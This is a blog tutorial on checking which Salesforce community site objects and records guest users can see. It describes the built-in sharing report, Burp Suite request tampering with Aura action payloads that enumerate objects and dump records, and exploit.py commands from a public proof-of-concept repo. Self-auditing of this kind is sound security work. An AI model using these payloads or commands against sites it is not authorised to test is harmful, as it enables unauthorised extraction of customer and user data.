Join us to learn about How to Check objects/records visible to guest users in Community Site. Salesforce community site is a powerful way to connect with your customers, partners, and employees. You can create a branded online space where they can access information, share ideas, and collaborate with each other. You can also use it to receive user queries in the form of cases. However, as with any online platform, you need to ensure that your community site is secure and protected from malicious attacks.
Check objects/records visible to guest users
In this blog post, I will show three approaches through which we can check what objects/records are visible to site guest users. If you are new to Salesforce Community Site “A Deep Dive into Salesforce Experience Cloud“
Prerequisite
- Basic Knowledge of Salesforce.
- Basic Understanding of Burp Suite.
- Basic knowledge of Github.
Methods
- Using Salesforce Sharing Rule Access Report.
- Using Burp Suite Tool.
- Using Github Repos.
Salesforce Sharing Rule Access Report
The first approach is to check how many records and objects are visible to our guest site user. Salesforce automatically generates a report for this purpose. To access this report, go to Setup and search for Guest User Sharing Rule Access Report. You will see a link under the Security Settings heading. This report shows you the number of records and objects that are accessible to each guest user profile in your org. You can use this report to audit and review your guest user sharing settings and ensure that they are aligned with your business requirements.
Report will look like this
Burp Suite Tool
Burp Suite is a set of tools used for web application security testing. It allows you to intercept, modify, and analyze the traffic between your browser and the web server. You can use Burp Suite to identify and exploit vulnerabilities, such as SQL injection, cross-site scripting, and broken authentication
Use Burp Suite to perform the following steps:
- Find the Salesforce Community site URL and the guest user profile name.
- Use Burp Intruder to brute-force the object names that are accessible by the guest user.
- Use Burp Repeater to craft and send SOQL queries to the object names and retrieve the data.
Steps Needed in Burp Suite
- Open Burp Suite and create a temporary project. Once you are on the home page, click on the target tab and select open browser.
- A chromium browser tab will open. Enter the URL of the community site and hit enter. Burp Suite will intercept all your requests and display them in its window.
- Select any POST request and send it to the repeater. You can do this by right-clicking on the request and choosing the option “Send to Repeater” or by pressing Ctrl + R. Switch to the Repeater tab.
- Move to Repeater Tab.
- Now copy the message text to decode it and modify it with our call. (Note: These message represent function that can be called against this microservice)
- Use Url decoder to decode it and copy the decoded message.
Your decoded message context will look like this:
{"actions":[{"id":"213;a","descriptor":"serviceComponent://ui.self.service.components.controller.SupportQuickActionLayoutController/ACTION$getFieldsForQuickActionLayout","callingDescriptor":"UNKNOWN","params":{"quickActionName":"GuestCommunityCase"},"storable":true}]}
Update Descriptor and params:
{"actions":[{"id":"213;a","descriptor":"serviceComponent://ui.force.components.controllers.hostConfig.HostConfigController/ACTION$getConfigData","callingDescriptor":"UNKNOWN","params":{},"storable":true}]}
- Use Url encoder to encode our updated message context and copy the encoded message.
- Replace message payload with new encoded message in request of burp suite and press send button. In response you will see a list of all object whose record are accessible to guest user.
- Similarly to get records of any accessible Object use below message payload and replace entityNameOrId value with your Object Name. Again encode updated message payload before replacing message body in Burp Suite.
{"actions":[{"id":"296;a","descriptor":"serviceComponent://ui.force.components.controllers.lists.selectableListDataProvider.SelectableListDataProviderController/ACTION$getItems","callingDescriptor":"UNKNOWN","params":{"entityNameOrId":"Account","pageSize":1000,"currentPage":0,"getCount":true,"layoutType":"FULL","enableRowActions":true,"useTimeout":true}}]}
- Hit send button. In response you will see a list of all record of a particular Object accessible to guest user.
References : https://www.varonis.com/blog/abusing-salesforce-communities
Using Github Repos
There are bunch of repos available online which allow you to test guest user privilege on Community site.
You can clone this repo and play around to check guest user privilege for community site.
https://github.com/moniik/poc_salesforce_lightning.git
Steps
- For Extracting list of Object accessible to guest user you can use following command in terminal.
python3 exploit.py -u https://domain.force.com/path/ -l
- Similarly to extract particular Object or multiple Object records visible to guest user You can use following command.
python3 exploit.py -u https://domain.force.com/path/ -o User Account